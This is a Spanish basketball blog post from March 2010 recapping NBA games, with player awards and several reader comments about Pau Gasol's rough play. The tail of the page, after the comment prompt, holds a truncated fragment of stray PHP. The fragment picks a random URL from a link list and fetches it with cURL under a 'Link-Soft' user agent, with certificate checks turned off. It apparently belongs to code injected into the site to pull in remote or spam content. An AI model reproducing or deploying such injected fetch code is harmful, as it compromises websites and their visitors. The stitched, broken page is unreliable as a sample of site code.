La Crónica (12/03/2010)

13 de March de 2010 por TheDeerHunter

No empezaron bien las cosas para los Lakers anoche en Phoenix. En el primer cuarto Amaré demolió todo el juego interior angelino ensañándose con los problemas de faltas de los principales hombres grandes rivales. A partir de ahí los amarillos transmutaron y mostraron otra vez la cara “playoffs”, defensivamente  hablando, como hace unos días hicieron contra Denver. El balance mejora significativamente cuando Kobe encuentra a sus compañeros. Anoche volvió a rozar el triple doble con 8 asistencias, absorbiendo sutilmente menos juego. El balance de victorias cuando Kobe lanza menos de 20 tiros es de 16-3, seguro que el crack lo firmaría para toda la temporada y los playoffs. El caso es con la Mamba en modo generoso el equipo se refresca en defensa y en ataque. Anoche lo volvieron a demostrar firmando todos un partido muy completo. Por cierto, que Gasol le ha pillado el gusto a eso de tratar de partirle la cabeza a los rivales. A ver si en lugar de Gasoft se va a mutar en Pau “BruceBowen”. No creo que nos gustara.

Los Cavs, en el regreso de LeBron, pasaron las de caín en Philadelphia. Los Sixers perdonaron al final y perdieron como casi siempre. Los Celtics tuvieron menos problemas para doblegar a los Pacers en el mejor partido de Nate Robinson desde su fichaje. Por su parte, los Nuggets también sufrieron considerablemente en Nueva Orleans. Peor les fue a los Thunder que por un pelo no tropezaron en casa contra los Nets y los Jazz que sí hincaron la rodilla en Milwaukee.

Ultimando el repaso de los equipos de playoffs, los Bobcats ganaron bien a los Clippers, los Heat dieron buena cuenta de los Bulls, los Spurs barrieron a los Wolves y los Blazers conquistaron el ARCO Arena de Sacramento.

En el duelo de españoles New York@Memphis, Sergio y Marc cuajaron correctos partidos. Los Grizzlies están un peldaño por encima de los Knicks y además están a otras cosas. En otras guerras decir que tanto Toney Douglas como Bill Walker estuvieron particularmente bien. Sergio monta un circo y le crecen los enanos.

Por último los Pistons ganaron a los Wizards, de la mano de Will Bynum.

PREMIOS

MVP: Destacaremos a Carmelo Anthony que brilló en un partido especialmente complicado en New Orleans con 32 puntos, 12 rebotes y 3 asistencias.

El rookie: Hace tiempo que no destacamos positivamente a Brandon Jennings. Anoche fue un estilete ante la dura defensa Sloan. 23 puntos, 4 rebotes y 6 asistencias fundamentales para la victoria.

La sorpresa: No es frecuente que haya nadie en los Heat que destaque por encima de Wade. Anoche lo hicieron dos: Quentin Richardson y Jermaine O’neal.

La decepción: Kirilenko+Millsap=4 puntos en 40 minutos. Buena parte de la culpa de la derrota en Milwaukee recae sobre ellos.

El mayor esfuerzo en vano: Podríamos nombrar a David West, a Stoudamire, Iguodala… pero hoy me quedo con un olvidado del mundo: Devin Harris 19 puntos, 5 rebotes, 8 asistencias y 3 robos. Engordar para morir.

Comenta

5 comentarios a esta entrada

  1. sergio dice:
    #1

    Una pena que Memphis este a 4,5 partidos de Portland porque los veo mucho mas capacitados para dar la sorpresa (bueno… no contra los Lakers) que el equipo de Oregon. Ayer vi el partido entre los ositos y los Knickerbockers y la verdad es que el sistema de juego de uno y otro es totalmente diferente… Memphis suele buscar a sus pivots o bloqueos multiples para anotar tiros faciles y cercanos. NY suele buscar mas los huecos para tiros lejanos… y en cuanto al contragolpe de unos y otros, me parece mas potente el de los Grizz’s por mucho que D’Antoni tenga fama de juego rapido..

    No es que me vaya a gustar que Gasol se convierta en un nuevo Bowen, pero si que empiecen a tenerle respeto y sepa sacar caracter. Ya no le volveran a llamar blandito… seguro

      Citar

  2. Love Denise dice:
    #2

    pienso que para ganarte el respeto en la NBA no hay que ir repartiendo leñazos por ahí, como ha hecho Pau esta semana. Es un auténtico crack y siempre me ha caido fenomenal por su personalidad, pero parece que el “glamour” de L.A. le está afectando ultimamente a las neuronas. Mejor, que se dedique a jugar como sabe, y menos repartir cera y llorar, que eso es más propio de jugadores bocazas y payasetes.
    He leido las crónicas de los diarios deportivos más importantes, y parece ser que justifican los manotazos de Gasol como “que marca el nivel defensivo del equipo”, o “que se hace respetar”, no sé por qué pero esto me recuerda al codazo injustificable de CR96 al jugador del Malaga.
    Si hubiera sido al revés, estarían hablando de otras cosas, aun recuerdo la crucifixión de Barnes en los diarios y foros, y eso que ni le llegó a dar a Kobe
    En aspectos deportivos, creo que este es el camino a seguir por Lakers, con Kobe aprovechando todas sus cualidades para hacer mejor a sus compañeros, y que éstos asuman más responsabilidad.
    Creía que McGrady aun le quedaba algo que ofrecer, pero veo que está totalmente acabado.
    Excelente partido de Anthony, y como sorpresa, podríamos destacar también la de Petro (10-10) saliendo de titular con los Nuggets.

      Citar

  3. TheDeerHunter dice:
    #3

    Sin que sirva de precedente, estoy de acuerdo con una cosa que dice Love Denise.
    El respeto se gana con la defensa que le hizo a Howard en la final. Pegándole leñazos a un jugador relativamente honesto como Admunson… pues no lo veo. Para mí completamente injustificado… y un poco cobarde, si me lo permitís.

      Citar

  4. Love Denise dice:
    #4

    como que sin que sirva de precedente? es que mis opiniones no son coherentes? jejejejejeje

    Pues sí, cobarde, injustificado y totalmente absurdo. Y ya van 2 en una semana, a ver si Stern le va poniendo ya alguna sanción y se le van bajando ya los humos, que porque sea un crack, juegue en el equipo campeón vigente, y con más glamour e historia (con permiso de Celtics) no tiene derecho a ir repartiendo mamporros a diestro y siniestro, y más cuando ya ha demostrado lo que puede hacer en defensa sin recurrir al garrotazo.

      Citar

  5. Love Denise dice:
    #5

    He vsito el Magic-Wizards, ha sido un partido cómodo para los de Florida, a pesar del susto inicial que dio Washington, el 2º cuarto fue espectacular yendose a los 41 puntos, los Magic contaron con un Howard dominador, con Van Gundy repartiendo minutos y una gran aportación desde el banquillo con Jay-Will, Redick y también la de Brandon Bass, por fín V.Gundy le está dando minutos, aunque éstos tengan que ser en detrimento de Ryan Anderson, el cual tuvo un sensacional comienzo de temporada. Destacar también la irregular campaña de Lewis, hoy se quedó en 3 puntos jugando poco debido a las faltas personales y al buen rendimiento de Bass. A pesar de su irregularidad y su contratazo, creo que su figura es clave para Howard y propiciarle el espacio en la zona que necesita esta bestia. Yo no le traspasaría, el que ultimamente ha perdido protagonismo es el francés Pietrus.

    Del resto, sorpeson de los Knicks, con 4 tíos por encima de los 20 puntos, y metiendole la del pulpo a los Mavs con su artillería al completo, en su cancha, y por 34 puntos¡¡¡¡¡. Quizás sea mal pensado, pero no acabo de creerme este resultado. Sergio no jugó por decisión de D’antoni y es que Toney Douglas se ha marcado el partido de su vida con un 21-8 y 8/10 en el tiro.
    Calderón ha hecho un partidazo con 24-12 y 7/8 en triples, aunque Curry y Ellis no se han quedado atrás y han hecho 35 y 31 respectivamente, y 10 triples entre ambos. Para contratazo el del turco, un 12-4-4 me resultan insuficientes para 10 kilos al año y hoy se ha marcado un 4-6-8.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>